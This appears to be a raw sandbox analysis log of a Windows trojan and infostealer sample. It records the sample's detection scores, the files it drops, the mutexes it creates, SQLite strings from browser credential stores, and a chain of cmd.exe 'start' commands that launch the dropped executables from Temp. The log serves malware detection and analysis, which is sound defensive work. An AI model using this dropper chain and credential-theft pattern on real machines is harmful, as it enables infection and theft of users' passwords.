Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9935302734375
Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9891357421875
Source: AFBFHDBKJE.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: AFBFHDBKJE.exe.0.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: amadka[1].exe.0.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.9982923497267759
Source: explorti.exe.8.dr Static PE information: Section: wcjrprme ZLIB complexity 0.9942531117384056
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9901123046875
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.99359130859375
Source: 6e6e496542.exe.10.dr Static PE information: Section: ZLIB complexity 0.9901123046875
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C7F7030
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Rnteb46TuM.exe, 00000000.00000003.2184576548.0000000023068000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000003.2170995547.0000000023074000.00000004.00000020.00020000.00000000.sdmp, GIIEGHIDBGHIECAAECGD.0.dr, JEBKECAFIDAFIECBKEHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Rnteb46TuM.exe, 00000000.00000002.2330894053.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Rnteb46TuM.exe Virustotal: Detection: 82%
Source: Rnteb46TuM.exe ReversingLabs: Detection: 91%
Source: AFBFHDBKJE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Rnteb46TuM.exe String found in binary or memory: uy/AdD
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File read: C:\Users\user\Desktop\Rnteb46TuM.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Rnteb46TuM.exe "C:\Users\user\Desktop\Rnteb46TuM.exe"
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe"
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe" Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Section loaded: version.dll Jump to behavior
